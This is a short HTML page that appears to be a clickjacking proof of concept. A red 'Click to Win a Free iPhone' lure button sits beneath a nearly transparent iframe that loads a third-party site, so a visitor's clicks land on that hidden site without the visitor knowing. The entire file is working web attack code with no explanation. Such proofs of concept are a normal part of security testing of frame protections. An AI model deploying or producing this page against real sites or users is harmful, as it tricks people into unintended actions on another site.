<!DOCTYPE html>
<html>
<head>
  <title>Free iPhone Giveaway!</title>
  <style>
    body {
      margin: 0;
    }
    .bait-button {
      position: absolute;
      top: 120px;
      left: 50px;
      width: 300px;
      height: 100px;
      background-color: red;
      color: white;
      font-size: 24px;
      text-align: center;
      line-height: 100px;
      z-index: 1;
    }
    iframe {
      position: absolute;
      top: 120px;
      left: 50px;
      width: 300px;
      height: 100px;
      opacity: 0.01; /* hidden */
      z-index: 2;
      border: none;
    }
  </style>
</head>
<body>
  <div class="bait-button">Click to Win a Free iPhone 📱</div>
  <iframe src="https://licensing-expo-collections.netlify.app"></iframe>
</body>
</html>
